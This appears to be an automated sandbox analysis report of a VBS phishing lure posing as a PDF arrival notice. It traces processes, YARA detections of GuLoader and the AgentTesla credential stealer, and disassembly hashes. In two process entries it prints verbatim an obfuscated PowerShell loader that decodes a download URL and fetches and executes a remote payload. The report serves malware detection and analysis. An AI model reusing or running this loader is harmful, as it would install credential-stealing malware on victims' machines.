                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:1
                                                        Start time:11:06:51
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\System32\wscript.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs"
                                                        Imagebase:0x7ff74f590000
                                                        File size:170'496 bytes
                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:11:06:53
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x7ff72d8c0000
                                                        File size:496'640 bytes
                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:3
                                                        Start time:11:07:04
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam ndDrawbepub.ir BrdssTreet[Hyper$AnspoS offetRemineStil,nFrilsoBolt tForlaaGrounp Pse,hopregr ExhauCubi.m ,occ]Under=Udkla$Uds.yBChinkr EpidoBear.d S.nufRaffir,recas Info ');$Dandy=Banuyo17 'CalvrKFremtrDaab,eDri,hm agneegtefor AcqueTusintro,an. A,icD UdsaospektwUlt,an VelolMo,dno,oniraFlattd ReasFMlke.iKlarhlSelv eDelag(Sero,$ BysbAIncogm SprupVaskeuFodertRets ablacktUreosiCholuoStepdnIlyapeUnbl,rHuara,Quaif$ ngrasNautieCuratmjuvaviReminp Ne,brBenedoSprjtv ,ermeUnsynn Ulis) .ope ';$Dandy=$Fuldmaaner[1]+$Dandy;$semiproven=$Fuldmaaner[0];decoupled (Banuyo17 'almo,$BrevagneighlSpa robruntbLithoaRegralPulld:BureaUUnsymnundoudAf ameProgrrDemeas UnretForb.eKo,temStatsm D.rge TilsnFabri=Natur(.itioTPrei,eBricks Vi etMolek-DespoPso,edaHeatithofteh Lido Guess$Ph llsUnchre AssomGenneiGer.ipcrimsrSt,ngo Vaa,vtrreheStor,nhavne)Overe ');while (!$Understemmen) {decoupled (Banuyo17 'Tilgo$svigeg starl sko o EvadbArariaAgurkl rets:tri oNclo.pa Twirs Sm,dtRegioiSprogeEnergs.orgatMistr=Indef$StenttReklarDialeuCherueBh is ') ;decoupled $Dandy;decoupled (Banuyo17 'T,gseSMeto.tHyperaPre.erFrisktC,alm-MacroSS,inelBesseeGuth,eUnfurpTaler My.l4Phase ');decoupled (Banuyo17 ' Card$Unsipgprdikl I.peo T,efb binaaH.sdel le s: GlasUSweetnOnerodO erheFjendrReprosProvetPalpaeAlit.mM.stim u.ele.deelnLeven= Hj f(InestTProgreUdenos FrsttTilsl- C ilPWraina Pod tSvipthRoere s bcy$M.untsOesopeBombamRubini OutdpImpolrSb,booRhiz.vMalere R conArkad)Liban ') ;decoupled (Banuyo17 'Coun $Bruttg.ommel ,ardo Ess,bIagttaCelebl Domi:DiamoTdithirTineauIndklgD koleEghj,nMatriePommesOitic=Semi.$Acce,gGarrolBo,dhoCalmsbFunktaW,llilAmimi: Ls,iSAkup aKonkumOverls,yttesD.kup+ Fina+darwi%Sooge$EyingBCheboo MemotInb orInd ey Wedgl Fa.il Lu.ti IncidP,ecea ConfeTrihy.SkrigcMesitoAf,enu PagonStutftBevel ') ;$Amputationer=$Botryllidae[$Trugenes];}decoupled (Banuyo17 'Compu$Multig .ydalPremioNinjab scataKuglelP rfe:Pew.nNAngreaMezenz ImpeaDaah r,apani IlsetUnemai AporsRe tomTappi Cell =Cykel RegleGE,igoeFor.ut Rev.-MattiCManu oRottinunh,ct IdioeindusnBinaetResyn ,akul$Kontasend.ge Vil.m Sal.iKautipFialer KonfoAm.unvBolsteBagsdn Whi, ');decoupled (Banuyo17 'Milit$DdssygDjthalRgelsoDualmbS.arcaAuxollBroch:SlgtnViteruvT nfoeoverctBellas G ab Haver=Forh, Udbri[UndslSChittyteksts P.eatKogekeNo.com Tids.SquamCBr,ndoExternStatevNordseM,ssirEjendt Auto]No me:Lumba:SorbuF GstfrCaly.oFortrmNavneBKdfula Unbrs OutgeOo,on6 ate4 PhreSSmu,st MoldrKloakiAlimenSavarg Uroc(Svovl$ BracNI fikaPacanz ubea T anrdildeiAffectB,odaiJ,rvis UsikmGets.)Fejld ');decoupled (Banuyo17 'Passa$ B,angHaimal elfloUdradbJessea EngolVirus:HemauOUdenovPettiePleskr Synss,fterl RetraWind,cDatalk rosk Stri.= Te,o Supra[LsengS.icroy ubves to.atSletheOrchimFestl. SpisThuskeei.fanxBolewtS,ovf.UncivEOvertnRewe,cFaktooStatsdAttesi GlipnShawngTppef] C,bm:P.ede: aturASunstS gin,C dereI T.skICarth.MisauG RodeeUpshotHuskaSGroott.illirEuromiImpisnhennegHal,p(Fortr$ P,liV PorcvbaryleLydset Vests Grun)Metab ');decoupled (Banuyo17 'Syvaa$ PrudgacronlSurinoDigambImp ga irkelAgate:BendaBLo.giuR,erlr MitinSammefUnrusiBerggrSupereNonem=Nymph$FirblO Bes,vFork,eLums.r TiewsinduslR wina.nmelcStempk her .ume.dsFryt,u astb V,rms F,retLmb.rrSkamfi umbonAs,ongParei(Ic nh3Bl,dp0toptr5Fil.p7Priva0Folke6Linie,Painf2kalib9Fleet9Super6C,rom1Dinne)Tack. ');decoupled $Burnfire;"
                                                        Imagebase:0x7ff760310000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:11:07:04
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff70f010000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:11:07:08
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
                                                        Imagebase:0x7ff70dfa0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:9
                                                        Start time:11:07:15
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam ndDrawbepub.ir BrdssTreet[Hyper$AnspoS offetRemineStil,nFrilsoBolt tForlaaGrounp Pse,hopregr ExhauCubi.m ,occ]Under=Udkla$Uds.yBChinkr EpidoBear.d S.nufRaffir,recas Info ');$Dandy=Banuyo17 'CalvrKFremtrDaab,eDri,hm agneegtefor AcqueTusintro,an. A,icD UdsaospektwUlt,an VelolMo,dno,oniraFlattd ReasFMlke.iKlarhlSelv eDelag(Sero,$ BysbAIncogm SprupVaskeuFodertRets ablacktUreosiCholuoStepdnIlyapeUnbl,rHuara,Quaif$ ngrasNautieCuratmjuvaviReminp Ne,brBenedoSprjtv ,ermeUnsynn Ulis) .ope ';$Dandy=$Fuldmaaner[1]+$Dandy;$semiproven=$Fuldmaaner[0];decoupled (Banuyo17 'almo,$BrevagneighlSpa robruntbLithoaRegralPulld:BureaUUnsymnundoudAf ameProgrrDemeas UnretForb.eKo,temStatsm D.rge TilsnFabri=Natur(.itioTPrei,eBricks Vi etMolek-DespoPso,edaHeatithofteh Lido Guess$Ph llsUnchre AssomGenneiGer.ipcrimsrSt,ngo Vaa,vtrreheStor,nhavne)Overe ');while (!$Understemmen) {decoupled (Banuyo17 'Tilgo$svigeg starl sko o EvadbArariaAgurkl rets:tri oNclo.pa Twirs Sm,dtRegioiSprogeEnergs.orgatMistr=Indef$StenttReklarDialeuCherueBh is ') ;decoupled $Dandy;decoupled (Banuyo17 'T,gseSMeto.tHyperaPre.erFrisktC,alm-MacroSS,inelBesseeGuth,eUnfurpTaler My.l4Phase ');decoupled (Banuyo17 ' Card$Unsipgprdikl I.peo T,efb binaaH.sdel le s: GlasUSweetnOnerodO erheFjendrReprosProvetPalpaeAlit.mM.stim u.ele.deelnLeven= Hj f(InestTProgreUdenos FrsttTilsl- C ilPWraina Pod tSvipthRoere s bcy$M.untsOesopeBombamRubini OutdpImpolrSb,booRhiz.vMalere R conArkad)Liban ') ;decoupled (Banuyo17 'Coun $Bruttg.ommel ,ardo Ess,bIagttaCelebl Domi:DiamoTdithirTineauIndklgD koleEghj,nMatriePommesOitic=Semi.$Acce,gGarrolBo,dhoCalmsbFunktaW,llilAmimi: Ls,iSAkup aKonkumOverls,yttesD.kup+ Fina+darwi%Sooge$EyingBCheboo MemotInb orInd ey Wedgl Fa.il Lu.ti IncidP,ecea ConfeTrihy.SkrigcMesitoAf,enu PagonStutftBevel ') ;$Amputationer=$Botryllidae[$Trugenes];}decoupled (Banuyo17 'Compu$Multig .ydalPremioNinjab scataKuglelP rfe:Pew.nNAngreaMezenz ImpeaDaah r,apani IlsetUnemai AporsRe tomTappi Cell =Cykel RegleGE,igoeFor.ut Rev.-MattiCManu oRottinunh,ct IdioeindusnBinaetResyn ,akul$Kontasend.ge Vil.m Sal.iKautipFialer KonfoAm.unvBolsteBagsdn Whi, ');decoupled (Banuyo17 'Milit$DdssygDjthalRgelsoDualmbS.arcaAuxollBroch:SlgtnViteruvT nfoeoverctBellas G ab Haver=Forh, Udbri[UndslSChittyteksts P.eatKogekeNo.com Tids.SquamCBr,ndoExternStatevNordseM,ssirEjendt Auto]No me:Lumba:SorbuF GstfrCaly.oFortrmNavneBKdfula Unbrs OutgeOo,on6 ate4 PhreSSmu,st MoldrKloakiAlimenSavarg Uroc(Svovl$ BracNI fikaPacanz ubea T anrdildeiAffectB,odaiJ,rvis UsikmGets.)Fejld ');decoupled (Banuyo17 'Passa$ B,angHaimal elfloUdradbJessea EngolVirus:HemauOUdenovPettiePleskr Synss,fterl RetraWind,cDatalk rosk Stri.= Te,o Supra[LsengS.icroy ubves to.atSletheOrchimFestl. SpisThuskeei.fanxBolewtS,ovf.UncivEOvertnRewe,cFaktooStatsdAttesi GlipnShawngTppef] C,bm:P.ede: aturASunstS gin,C dereI T.skICarth.MisauG RodeeUpshotHuskaSGroott.illirEuromiImpisnhennegHal,p(Fortr$ P,liV PorcvbaryleLydset Vests Grun)Metab ');decoupled (Banuyo17 'Syvaa$ PrudgacronlSurinoDigambImp ga irkelAgate:BendaBLo.giuR,erlr MitinSammefUnrusiBerggrSupereNonem=Nymph$FirblO Bes,vFork,eLums.r TiewsinduslR wina.nmelcStempk her .ume.dsFryt,u astb V,rms F,retLmb.rrSkamfi umbonAs,ongParei(Ic nh3Bl,dp0toptr5Fil.p7Priva0Folke6Linie,Painf2kalib9Fleet9Super6C,rom1Dinne)Tack. ');decoupled $Burnfire;"
                                                        Imagebase:0xe60000
                                                        File size:433'152 bytes
                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.2017192523.0000000008C40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.2007819028.00000000061C2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.2017391660.0000000009585000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:10
                                                        Start time:11:07:16
                                                        Start date:18/04/2024
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
                                                        Imagebase:0xc50000
                                                        File size:236'544 bytes
                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:12
                                                        Start time:11:07:42
                                                        Start date:18/04/2024
                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                        Imagebase:0xe30000
                                                        File size:516'608 bytes
                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2645999528.0000000025C45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2645999528.0000000025C45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2645999528.0000000025C6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000002.2627141009.0000000004605000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false

                                                        Disassembly

                                                        Reset < >

                                                          Executed Functions

                                                          Function 00007FF886E4B596 Relevance: 3.0, Strings: 2, Instructions: 474COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2466886453.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff886e40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: _.BF$_.BF
                                                          • API String ID: 0-1703367604
                                                          • Opcode ID: e9b58df6a64b221e4f53a8180631a40f3614b0eb07b830ac9140b748fd8fed81
                                                          • Instruction ID: 296c07dd094313af914b3e48c47d9f9b3fe0375103a294b8b47b868bdcea73d3
                                                          • Opcode Fuzzy Hash: e9b58df6a64b221e4f53a8180631a40f3614b0eb07b830ac9140b748fd8fed81
                                                          • Instruction Fuzzy Hash: 15F1953091CA8E8FEBA8DF28C8557E937E1FF55350F14426AD84DC7291CB349945CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF886E4C342 Relevance: 3.0, Strings: 2, Instructions: 460COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2466886453.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff886e40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: _.BF$_.BF
                                                          • API String ID: 0-1703367604
                                                          • Opcode ID: 5d088fdf003e8cee3ea77c5af442024e25f76b59ecbf35b73c054ff95467f053
                                                          • Instruction ID: 17ec12f0efd437dbf8ac2988055bba046733fb3ed0b7255a9e24e4a3789c7887
                                                          • Opcode Fuzzy Hash: 5d088fdf003e8cee3ea77c5af442024e25f76b59ecbf35b73c054ff95467f053
                                                          • Instruction Fuzzy Hash: 5CE1C130908A8E8FEBA8DF28C8557F937E1FF54750F14426AD84DC7291DA78A945CB82
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF886F14169 Relevance: .5, Instructions: 459COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2468213777.00007FF886F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff886f10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 05afe30eb6d7e5586ac9238e4d920caae5f62021a2ee7203f39a38250bf0ffe6
                                                          • Instruction ID: 308f7adec88457b173bbae05522908ae8f143171b6fa1be3f686c0188134d55d
                                                          • Opcode Fuzzy Hash: 05afe30eb6d7e5586ac9238e4d920caae5f62021a2ee7203f39a38250bf0ffe6
                                                          • Instruction Fuzzy Hash: 6DE11431D0DA8E8FE796DB6848556B87BE1FF963A0F1802BAC44DC71D2DA18EC46C741
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF886F1534D Relevance: .4, Instructions: 366COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2468213777.00007FF886F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff886f10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f78c9977b1553920cd027551657a42b05caf0423584b33d7ae29a0e3541b564
                                                          • Instruction ID: 3a5e0492b2d5af366bf618b5f76f790030f2bcc5a964c29dac2fb6bef2c030e9
                                                          • Opcode Fuzzy Hash: 0f78c9977b1553920cd027551657a42b05caf0423584b33d7ae29a0e3541b564
                                                          • Instruction Fuzzy Hash: B0B1E2B1E0DA8E4FE797DA6C58646B57BE2FF593A4B4801BAC00DC7192DA28DC05C341
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF886E4CAA0 Relevance: .2, Instructions: 222COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2466886453.00007FF886E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff886e40000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1a9a2baa8d1d2cd2f2ef10380a8e3d12bf76eab9bf72ced170f4196ae611c6fa
                                                          • Instruction ID: 14ab999b8c3850a1f544c51a27c4e6dce5d43dd4e942e53c554cfdf60ee37a89
                                                          • Opcode Fuzzy Hash: 1a9a2baa8d1d2cd2f2ef10380a8e3d12bf76eab9bf72ced170f4196ae611c6fa
                                                          • Instruction Fuzzy Hash: B9612470A1CA494FE749EB28C495BB5B7E1FF95390F20057DD08AC7297DA25F842CB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF886F14307 Relevance: .2, Instructions: 150COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2468213777.00007FF886F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff886f10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 41dba8cde32e9df6118b59f504c44f0d0dbbf6c4e00c9b58ec8bed745e487df6
                                                          • Instruction ID: c6cd07f78d03e5145cd902d7da740c12f8fd5ae07bf74c02beff7e46167a7288
                                                          • Opcode Fuzzy Hash: 41dba8cde32e9df6118b59f504c44f0d0dbbf6c4e00c9b58ec8bed745e487df6
                                                          • Instruction Fuzzy Hash: 1951B322D1DA8A8FE396DB6854516B8A6E2BF953E4F5801B9D40CC31D2DD1CEC46D702
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00007FF886F15472 Relevance: .1, Instructions: 108COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2468213777.00007FF886F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886F10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff886f10000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d599f8fa334c4287863cefbde9ec738b4473e47f083d1469485a8fd50c1a990d
                                                          • Instruction ID: 0c7cb62399094539e6a7888529cc61daf6d22f07711acdee1b5695f84bad4030
